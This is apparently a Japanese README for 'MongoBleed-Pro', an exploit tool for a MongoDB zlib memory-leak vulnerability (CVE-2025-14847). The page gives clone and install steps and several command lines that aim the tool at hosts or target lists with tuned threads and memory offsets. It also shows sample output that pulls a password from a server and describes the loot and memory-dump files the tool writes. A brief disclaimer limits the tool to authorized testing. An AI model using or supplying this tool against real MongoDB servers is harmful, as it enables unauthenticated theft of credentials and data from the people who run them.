
高度なMongoDBメモリリークエクスプロイトツール
Keep Learning | Keep Hacking with Alexcyberx
MongoBleed-Pro は、MongoDB の zlib 圧縮処理における深刻なメモリ情報漏えい脆弱性 CVE-2025-14847 を悪用するための高度なエクスプロイトツールです。このツールを使用すると、セキュリティ研究者は脆弱な MongoDB インスタンスから機密データを抽出できます。
このツールは許可を得たセキュリティテストおよび教育目的のみを対象としています。コンピュータシステムへの不正アクセスは違法です。テストの前に必ず適切な許可を取得してください。
| プロパティ | 詳細 |
|---|---|
| CVE ID | CVE-2025-14847 |
| 脆弱性の種類 | メモリ情報漏えい |
| 影響を受けるバージョン | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| 根本原因 | zlib 伸張処理におけるバッファオーバーリード |
| 影響 | 認証なしのリモートメモリリーク |
# Clone the repository
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| ファイル | 説明 |
|---|---|
loot_<host>.txt | 読み取り可能な形式で抽出されたシークレット |
dump_<host>.bin | 手動解析用の生メモリダンプ |
MongoDB 管理者の方は、パッチ適用済みバージョンに更新してください:
alexcyberx
このプロジェクトは MIT ライセンスの下で提供されています。詳細は LICENSE ファイルを参照してください。
このツールが役に立ったと思ったら、GitHub で ⭐ を付けてください!
「 Keep Learning | Keep Hacking 」
Made with ❤️ by alexcyberx
| 引数 | 説明 | デフォルト |
|---|
--target | ターゲット IP/URL | インタラクティブプロンプト |
--file | ターゲットリストを含むファイル | なし |
--threads | スレッド数 | 50 |
--min-offset | 最小メモリオフセット | 20 |
--max-offset | 最大メモリオフセット | 8192 |